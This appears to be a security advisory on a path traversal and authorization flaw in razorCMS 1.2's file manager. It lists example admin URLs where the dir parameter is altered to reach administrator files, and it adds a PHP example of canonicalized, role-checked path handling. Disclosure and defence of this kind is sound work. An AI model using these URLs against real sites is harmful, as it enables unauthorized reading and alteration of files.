razorCMS 1.2 Path Traversal 0day

razorCMS 1.2 Path Traversal

Author: chap0

Download: http://www.razorcms.co.uk/archive/core/

Affected version: 1.2

Tested on: Ubuntu

Fix: Upgrade to the latest release, 1.2.1


RazorCMS is vulnerable to path traversal. When logged in with a least
privileged user account, the user can access the administrator's and
super administrator's directories and files by changing the path in the
URL. The vulnerabilities exist in admin_func.php.


Path Traversal Details:

The following files and directories are vulnerable to the path traversal
attack, including any files or directories that the admin or super admin
may create within these directories:

http://bbs.admin8.us /admin/?action=filemanview&dir=razor_temp_logs/
http://bbs.admin8.us /admin/?action=filemanview&dir=backup/
http://bbs.admin8.us /admin/?action=filemanview&dir=/razor_data.txt
http://bbs.admin8.us /admin/?action=filemanview&dir=/index.htm


http://bbs.admin8.us /admin/?action=fileman&dir=razor_temp_logs/
http://bbs.admin8.us /admin/?action=fileman&dir=backup/
http://bbs.admin8.us /admin/?action=fileman&dir=/razor_data.txt
http://bbs.admin8.us /admin/?action=fileman&dir=/index.htm


For example, if the super admin creates a directory named sekrit within
razor_temp_logs, which should not be accessible to a least privileged user,
that user can still reach it by changing the path as shown below:

http://bbs.admin8.us /admin/?action=filemanview&dir=razor_temp_logs/sekrit/

The same works on files within those directories that the user should not
have access to, which at this point gives the user the ability to view, edit,
rename, move, copy and delete the file.

Example:

http://bbs.admin8.us /admin/?action=filemanview&dir=razor_temp_logs/sekrit/sekrit.txt
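The root cause described above is that the `dir` parameter is used as a path without being canonicalized and checked against what the logged-in role is allowed to browse. The following is an added example of such a check written for this page; it is not razorCMS's own admin_func.php code, and the function name `resolveBrowsePath`, the role names and the per-role root directories in `ALLOWED_ROOTS` are assumptions for the demonstration.

```php
<?php
// Added example: confine a user-supplied "dir" parameter to the roots its role may browse.
// Illustrative code, not razorCMS's admin_func.php; role names and roots are assumptions.

// Hypothetical per-role allow list, relative to the file-manager base directory.
// '.' means the whole base is browsable.
const ALLOWED_ROOTS = [
    'user'       => ['user_files'],
    'admin'      => ['user_files', 'razor_temp_logs', 'backup'],
    'superadmin' => ['.'],
];

/**
 * Resolve $dir (taken from the request) against $base and return the canonical path,
 * or null if it escapes $base or lies outside a root permitted for $role.
 */
function resolveBrowsePath(string $base, string $dir, string $role): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    // The parameter is meant to be relative: reject empty, absolute or NUL-containing values.
    if ($dir === '' || $dir[0] === '/' || strpos($dir, "\0") !== false) {
        return null;
    }
    // realpath() collapses "..", symlinks and duplicate separators; false means "does not exist".
    $target = realpath($baseReal . DIRECTORY_SEPARATOR . $dir);
    if ($target === false) {
        return null;
    }
    // Containment check: the canonical target must be $base itself or start with "$base/".
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if ($target !== $baseReal && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Role check: the path relative to $base must begin with one of the role's permitted roots.
    $relative = ($target === $baseReal) ? '.' : substr($target, strlen($prefix));
    foreach (ALLOWED_ROOTS[$role] ?? [] as $root) {
        if ($root === '.' || $relative === $root
            || strpos($relative, $root . DIRECTORY_SEPARATOR) === 0) {
            return $target;
        }
    }
    return null;
}

// --- Demonstration on a constructed directory tree under the system temp dir ---
$base = sys_get_temp_dir() . '/fileman_demo_' . getmypid();
foreach (['user_files', 'razor_temp_logs/sekrit', 'backup'] as $d) {
    mkdir("$base/$d", 0700, true);
}
file_put_contents("$base/razor_data.txt", 'constructed sample');
file_put_contents("$base/razor_temp_logs/sekrit/sekrit.txt", 'constructed sample');

$cases = [
    ['user',       'user_files/'],                        // allowed: the user's own root
    ['user',       'razor_temp_logs/sekrit/'],            // denied: outside the user's roots
    ['user',       'user_files/../razor_temp_logs/'],     // denied: ".." collapses to a forbidden root
    ['user',       '../'],                                // denied: escapes $base entirely
    ['admin',      'razor_temp_logs/sekrit/sekrit.txt'],  // allowed: admin may browse razor_temp_logs
    ['superadmin', 'razor_data.txt'],                     // allowed: superadmin may browse everything
];
foreach ($cases as [$role, $dir]) {
    $result = resolveBrowsePath($base, $dir, $role);
    printf("%-10s %-40s %s\n", $role, $dir, $result === null ? 'DENIED' : 'ALLOWED');
}
```

The two checks are deliberately separate: the containment check stops any `..` or symlink trick from leaving the file-manager base at all, and the role check then applies the same authorization on every request regardless of how the path was spelled, which is what the `filemanview` and `fileman` actions above are missing.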


Another vulnerability exists in this version of razorCMS: if a least privileged user creates
a directory with their own logged-in credentials and then deletes that directory, the user
then has access to the administrative directories and files.
